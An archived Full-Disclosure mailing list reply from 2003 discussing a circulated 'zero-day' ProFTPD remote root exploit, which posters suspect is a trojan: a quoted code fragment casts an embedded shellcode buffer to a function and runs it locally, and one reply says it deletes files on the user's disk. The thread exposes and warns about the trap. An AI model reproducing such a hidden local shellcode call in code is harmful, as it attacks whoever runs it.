
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>

<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2655.35">

<TITLE>RE: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit</TITLE>

</HEAD>

<BODY>


<P><FONT SIZE=2>This line seems suspicious. Don't know the purpose of the shellcode, but I won't try it.</FONT>

</P>


<P><FONT SIZE=2>&nbsp;&nbsp; /* connect to the bindshell */</FONT>

<BR><FONT SIZE=2>&nbsp;&nbsp; printf(&quot;Trying to connect, please wait...\n&quot;);</FONT>

</P>


<P><FONT SIZE=2>---&gt;&nbsp;&nbsp; void(*sleep)()=(void*)sc;sleep(5);&nbsp;&nbsp; &lt;------- Hummm :-\</FONT>

<BR><FONT SIZE=2>&nbsp;&nbsp; if(give_me_a_shell(addr) &lt; 0)</FONT>

</P>


<P><FONT SIZE=2>&nbsp;&nbsp;&nbsp;&nbsp; {</FONT>

<BR><FONT SIZE=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf(stderr, &quot;Sorry, exploit didn't work.\n&quot;);</FONT>

<BR><FONT SIZE=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return(-1);</FONT>

</P>


<P><FONT SIZE=2>The shellcode seems to be locally launched. Anybody to &quot;decrypt&quot; the shellcode ?</FONT>

</P>

<BR>

<BR>


<P><FONT SIZE=2>&gt; -----Message d'origine-----</FONT>

<BR><FONT SIZE=2>&gt; De : Andreas Gietl [<A HREF="mailto:a.gietl@e-admin.de">mailto:a.gietl@e-admin.de</A>]</FONT>

<BR><FONT SIZE=2>&gt; Envoyé : vendredi 24 octobre 2003 15:36</FONT>

<BR><FONT SIZE=2>&gt; À : Jean-Kevin Grosnakeur; full-disclosure@lists.netsys.com</FONT>

<BR><FONT SIZE=2>&gt; Objet : Re: [Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit</FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:</FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; this seems to delete sth on the local harddisk. anybody else </FONT>

<BR><FONT SIZE=2>&gt; seeing this </FONT>

<BR><FONT SIZE=2>&gt; effect?</FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; &gt; Ladies and gentlemen, here's the source code of the exploit </FONT>

<BR><FONT SIZE=2>&gt; for the latest</FONT>

<BR><FONT SIZE=2>&gt; &gt; release of ProFTPD. This is a Zero-Day private exploit, please DON'T</FONT>

<BR><FONT SIZE=2>&gt; &gt; REDISTRIBUTE. I will not take responsibility for any </FONT>

<BR><FONT SIZE=2>&gt; damages which could</FONT>

<BR><FONT SIZE=2>&gt; &gt; result from the usage of this exploit, use it at your own risk.</FONT>

<BR><FONT SIZE=2>&gt; &gt;</FONT>

<BR><FONT SIZE=2>&gt; &gt; </FONT>

<BR><FONT SIZE=2>&gt; --------------------------------------------------------------</FONT>

<BR><FONT SIZE=2>&gt; ------------</FONT>

<BR><FONT SIZE=2>&gt; &gt;</FONT>

<BR><FONT SIZE=2>&gt; &gt; Have fun ! @+</FONT>

<BR><FONT SIZE=2>&gt; &gt;</FONT>

<BR><FONT SIZE=2>&gt; &gt; _________________________________________________________________</FONT>

<BR><FONT SIZE=2>&gt; &gt; MSN Messenger 6&nbsp; <A HREF="http://g.msn.fr/FR1001/866" TARGET="_blank">http://g.msn.fr/FR1001/866</A> : plus de </FONT>

<BR><FONT SIZE=2>&gt; personnalisation,</FONT>

<BR><FONT SIZE=2>&gt; &gt; plus de fun pour vous et vos amis...</FONT>

<BR><FONT SIZE=2>&gt; &gt;</FONT>

<BR><FONT SIZE=2>&gt; &gt; _______________________________________________</FONT>

<BR><FONT SIZE=2>&gt; &gt; Full-Disclosure - We believe in it.</FONT>

<BR><FONT SIZE=2>&gt; &gt; Charter: <A HREF="http://lists.netsys.com/full-disclosure-charter.html" TARGET="_blank">http://lists.netsys.com/full-disclosure-charter.html</A></FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; -- </FONT>

<BR><FONT SIZE=2>&gt; e-admin internet gmbh</FONT>

<BR><FONT SIZE=2>&gt; Andreas Gietl&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tel </FONT>

<BR><FONT SIZE=2>&gt; +49 941 3810884</FONT>

<BR><FONT SIZE=2>&gt; Ludwig-Thoma-Strasse 35&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fax +49 </FONT>

<BR><FONT SIZE=2>&gt; (0)1805/39160 - 29104</FONT>

<BR><FONT SIZE=2>&gt; 93051 Regensburg&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mobil +49 </FONT>

<BR><FONT SIZE=2>&gt; 171 6070008</FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; PGP/GPG-Key unter <A HREF="http://www.e-admin.de/gpg.html" TARGET="_blank">http://www.e-admin.de/gpg.html</A></FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; _______________________________________________</FONT>

<BR><FONT SIZE=2>&gt; Full-Disclosure - We believe in it.</FONT>

<BR><FONT SIZE=2>&gt; Charter: <A HREF="http://lists.netsys.com/full-disclosure-charter.html" TARGET="_blank">http://lists.netsys.com/full-disclosure-charter.html</A></FONT>

<BR><FONT SIZE=2>&gt; </FONT>

<BR><FONT SIZE=2>&gt; This mail has originated outside your organization,</FONT>

<BR><FONT SIZE=2>&gt; either from an external partner or the Global Internet. </FONT>

<BR><FONT SIZE=2>&gt; Keep this in mind if you answer this message.</FONT>

<BR><FONT SIZE=2>&gt; </FONT>

</P>


</BODY>

</HTML>